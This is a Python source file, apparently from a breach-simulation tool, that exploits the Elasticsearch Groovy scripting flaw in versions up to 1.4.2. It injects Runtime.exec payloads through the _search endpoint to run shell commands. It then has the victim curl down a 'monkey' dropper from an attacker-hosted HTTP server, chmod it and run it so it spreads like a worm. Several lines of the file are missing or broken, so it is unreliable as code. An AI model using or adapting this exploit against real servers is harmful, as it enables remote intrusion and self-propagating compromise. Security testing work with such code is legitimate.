237 lines
8.7 KiB
237 lines
8.7 KiB
Implementation is based on elastic search groovy exploit by metasploit
Max vulnerable elasticsearch version is "1.4.2"
import json
import logging
import requests
from exploit import HostExploiter
from model import MONKEY_ARG
from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
__author__ = 'danielg'
LOG = logging.getLogger(__name__)
class ElasticGroovyExploiter(HostExploiter):
# attack URLs
BASE_URL = 'http://%s:%s/_search?pretty'
MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
_TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host)
self._config = __import__('config').WormConfiguration
self.skip_exist = self._config.skip_exploit_if_file_exist
def is_os_supported(self):
Checks if the host is vulnerable.
Either using version string or by trying to attack
if not super(ElasticGroovyExploiter, self).is_os_supported():
return False
if ES_SERVICE not in self.host.services:
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
return False
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
major = int(major)
minor = int(minor)
build = int(build)
if major > 1:
return False
if major == 1 and minor > 4:
return False
if major == 1 and minor == 4 and build > 2:
return False
return self.is_vulnerable()
def exploit_host(self):
real_host_os = self.get_host_os()
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
if 'linux' in self.host.os['type']:
return self.exploit_host_linux()
return self.exploit_host_windows()
def exploit_host_windows(self):
Will exploit windows similar to smbexec
return False
def exploit_host_linux(self):
Exploits linux using similar flow to sshexec and shellshock.
Meaning run remote commands to copy files over HTTP
uname_machine = str(self.get_linux_arch())
if len(uname_machine) != 0:
self.host.os['machine'] = str(uname_machine.lower().strip()) # strip unicode characters
dropper_target_path_linux = self._config.dropper_target_path_linux
if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True # return already infected
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
if not self.download_file_in_linux(src_path, target_path=dropper_target_path_linux):
return False
if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
return True
def run_monkey_linux(self, dropper_target_path_linux):
Runs the monkey
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + ' & '
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)):
LOG.info("Log file does not exist, monkey might not have run")
def download_file_in_linux(self, src_path, target_path):
Downloads a file in target machine using curl to the given target path
:param src_path: File path relative to the monkey
:param target_path: Target path in linux victim
:return: T/F
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__)
return False
download_command = '/usr/bin/curl %s -o %s' % (
http_path, target_path)
if (http_thread.downloads != 1) or (
'ELF' not in
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
return False
return True
def set_file_executable_linux(self, file_path):
Marks the given file as executable using chmod
:return: Nothing
chmod = '/bin/chmod +x %s' % file_path
LOG.info("Marked file %s on host %s as executable", file_path, self.host)
def check_if_remote_file_exists_linux(self, file_path):
cmdline = '/usr/bin/head -c 4 %s' % file_path
return self.run_shell_command(cmdline)
def run_shell_command(self, command):
Runs a single shell command and returns the result.
payload = self.JAVA_CMD % command
result = self.get_command_result(payload)
LOG.info("Ran the command %s on host %s", command, self.host)
return result
def get_linux_arch(self):
Returns host as per uname -m
return self.get_command_result(self.JAVA_GET_BIT_LINUX)
def get_host_tempdir(self):
Returns where to write our file given our permissions
:return: Temp directory path in target host
return self.get_command_result(self.JAVA_GET_TMP_DIR)
def get_host_os(self):
:return: target OS
return self.get_command_result(self.JAVA_GET_OS)
def is_vulnerable(self):
Checks if a given elasticsearch host is vulnerable to the groovy attack
:return: True/False
result_text = self.get_command_result(self.JAVA_IS_VULNERABLE)
return 'java.lang.Runtime' in result_text
def get_command_result(self, payload):
Gets the result of an attack payload with a single return value.
:param payload: Payload that fits the GENERIC_QUERY template.
result = self.attack_query(payload)
if not result: # not vulnerable
return False
return result[0]
def attack_query(self, payload):
Wraps the requests query and the JSON parsing.
Just reduce opportunity for bugs
:return: List of data fields or None
response = requests.get(self.attack_url(), data=payload)
result = self.get_results(response)
return result
def attack_url(self):
Composes the URL to attack per host IP and port.
:return: Elasticsearch vulnerable URL
return self.BASE_URL % (self.host.ip_addr, ES_PORT)
def get_results(self, response):
Extracts the result data from our attack
:return: List of data fields or None
json_resp = json.loads(response.text)
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
except KeyError:
return None